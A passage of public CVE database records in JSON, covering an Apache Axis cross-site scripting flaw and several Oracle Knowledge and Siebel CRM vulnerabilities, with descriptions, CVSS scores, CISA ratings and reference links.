"name": "[axis-java-dev] 20180708 [jira] [Created] (AXIS-2924) CVE-2018-8032 XSS vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3CJIRA.13170716.1531060536000.93536.1531060560060%40Atlassian.JIRA%3E"
},
{
"name": "[axis-java-dev] 20190925 [jira] [Commented] (AXIS-2924) CVE-2018-8032 XSS vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/d06ed5e4eeb77d00e8d594ec01ee8ee1cba173a01ac4b18f1579d041%40%3Cjava-dev.axis.apache.org%3E"
},
{
"name": "[axis-java-dev] 20190929 [jira] [Commented] (AXIS-2924) CVE-2018-8032 XSS vulnerability",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/3b89bc9e9d055db7eba8835ff6501f3f5db99d2a0928ec0be9b1d17b%40%3Cjava-dev.axis.apache.org%3E"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://issues.apache.org/jira/browse/AXIS-2924"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"name": "[debian-lts-announce] 20211117 [SECURITY] [DLA 2821-1] axis security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/11/msg00015.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Axis",
"vendor": "Apache Software Foundation",
"versions": [
{
"status": "affected",
"version": "1.x up to and including 1.4"
}
]
}
],
"datePublic": "2018-07-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T19:08:01.869746",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"name": "[axis-java-dev] 20180708 [jira] [Created] (AXIS-2924) CVE-2018-8032 XSS vulnerability",
"tags": [
"mailing-list"
],
"url": "http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3CJIRA.13170716.1531060536000.93536.1531060560060%40Atlassian.JIRA%3E"
},
{
"name": "[axis-java-dev] 20190925 [jira] [Commented] (AXIS-2924) CVE-2018-8032 XSS vulnerability",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/d06ed5e4eeb77d00e8d594ec01ee8ee1cba173a01ac4b18f1579d041%40%3Cjava-dev.axis.apache.org%3E"
},
{
"name": "[axis-java-dev] 20190929 [jira] [Commented] (AXIS-2924) CVE-2018-8032 XSS vulnerability",
"tags": [
"mailing-list"
],
"url": "https://lists.apache.org/thread.html/3b89bc9e9d055db7eba8835ff6501f3f5db99d2a0928ec0be9b1d17b%40%3Cjava-dev.axis.apache.org%3E"
},
{
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"url": "https://issues.apache.org/jira/browse/AXIS-2924"
},
{
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"name": "[debian-lts-announce] 20211117 [SECURITY] [DLA 2821-1] axis security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/11/msg00015.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2018-8032",
"datePublished": "2018-08-02T13:00:00Z",
"dateReserved": "2018-03-09T00:00:00",
"dateUpdated": "2024-09-16T16:29:01.816Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-3476
Vulnerability from cvelistv5
Published
2016-07-21 10:00
Modified
2024-10-11 20:55
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote attackers to affect confidentiality and integrity via vectors related to Information Manager Console.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id/1036400 | vdb-entry, x_refsource_SECTRACK | |
| http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/91787 | vdb-entry, x_refsource_BID | |
| http://www.securityfocus.com/bid/91948 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:56:13.795Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1036400",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1036400"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"name": "91787",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/91787"
},
{
"name": "91948",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/91948"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2016-3476",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-11T20:11:36.712060Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-11T20:55:46.824Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-07-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote attackers to affect confidentiality and integrity via vectors related to Information Manager Console."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-31T09:57:01",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"name": "1036400",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1036400"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"name": "91787",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/91787"
},
{
"name": "91948",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/91948"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2016-3476",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote attackers to affect confidentiality and integrity via vectors related to Information Manager Console."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1036400",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1036400"
},
{
"name": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html",
"refsource": "CONFIRM",
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"name": "91787",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/91787"
},
{
"name": "91948",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/91948"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2016-3476",
"datePublished": "2016-07-21T10:00:00",
"dateReserved": "2016-03-17T00:00:00",
"dateUpdated": "2024-10-11T20:55:46.824Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-3475
Vulnerability from cvelistv5
Published
2016-07-21 10:00
Modified
2024-10-11 20:55
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote authenticated users to affect confidentiality via vectors related to Information Manager Console.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id/1036400 | vdb-entry, x_refsource_SECTRACK | |
| http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html | x_refsource_CONFIRM | |
| http://www.securityfocus.com/bid/91787 | vdb-entry, x_refsource_BID | |
| http://www.securityfocus.com/bid/91944 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:56:14.217Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1036400",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1036400"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"name": "91787",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/91787"
},
{
"name": "91944",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/91944"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2016-3475",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-11T19:49:55.924164Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-11T20:55:53.323Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-07-19T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote authenticated users to affect confidentiality via vectors related to Information Manager Console."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-31T09:57:01",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"name": "1036400",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1036400"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"name": "91787",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/91787"
},
{
"name": "91944",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/91944"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2016-3475",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in the Oracle Knowledge component in Oracle Siebel CRM 8.5.x allows remote authenticated users to affect confidentiality via vectors related to Information Manager Console."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1036400",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1036400"
},
{
"name": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html",
"refsource": "CONFIRM",
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"name": "91787",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/91787"
},
{
"name": "91944",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/91944"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2016-3475",
"datePublished": "2016-07-21T10:00:00",
"dateReserved": "2016-03-17T00:00:00",
"dateUpdated": "2024-10-11T20:55:53.323Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-2791
Vulnerability from cvelistv5
Published
2020-04-15 13:29
Modified
2024-09-30 14:53
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Knowledge |
Version: 8.6.0-8.6.2 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T07:17:02.704Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2020-2791",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-30T14:50:35.202139Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-30T14:53:53.490Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Knowledge",
"vendor": "Oracle Corporation",
"versions": [
{
"status": "affected",
"version": "8.6.0-8.6.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-15T13:29:46",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2020-2791",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Knowledge",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "8.6.0-8.6.2"
}
]
}
}
]
},
"vendor_name": "Oracle Corporation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
}
]
},
"impact": {
"cvss": {
"baseScore": "9.8",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.oracle.com/security-alerts/cpuapr2020.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2020-2791",
"datePublished": "2020-04-15T13:29:46",
"dateReserved": "2019-12-10T00:00:00",
"dateUpdated": "2024-09-30T14:53:53.490Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-2931
Vulnerability from cvelistv5
Published
2020-04-15 13:29
Modified
2024-09-27 18:49
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Web Applications - InfoCenter). Supported versions that are affected are 8.6.0-8.6.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Knowledge |
Version: 8.6.0-8.6.3 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T07:24:00.560Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2020-2931",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-27T17:50:57.447288Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-27T18:49:13.599Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Knowledge",
"vendor": "Oracle Corporation",
"versions": [
{
"status": "affected",
"version": "8.6.0-8.6.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Web Applications - InfoCenter). Supported versions that are affected are 8.6.0-8.6.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-15T13:29:53",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2020-2931",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Knowledge",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "8.6.0-8.6.3"
}
]
}
}
]
},
"vendor_name": "Oracle Corporation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Web Applications - InfoCenter). Supported versions that are affected are 8.6.0-8.6.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."
}
]
},
"impact": {
"cvss": {
"baseScore": "9.8",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.oracle.com/security-alerts/cpuapr2020.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2020-2931",
"datePublished": "2020-04-15T13:29:53",
"dateReserved": "2019-12-10T00:00:00",
"dateUpdated": "2024-09-27T18:49:13.599Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-2795
Vulnerability from cvelistv5
Published
2020-04-15 13:29
Modified
2024-09-30 14:49
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Knowledge executes to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H).
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Knowledge |
Version: 8.6.0-8.6.2 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T07:17:02.673Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2020-2795",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-30T14:41:34.680981Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-30T14:49:06.041Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Knowledge",
"vendor": "Oracle Corporation",
"versions": [
{
"status": "affected",
"version": "8.6.0-8.6.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.2. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Knowledge executes to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H)."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Knowledge executes to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Knowledge.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-15T13:29:46",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2020-2795",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Knowledge",
"version": {
"version_data": [
{
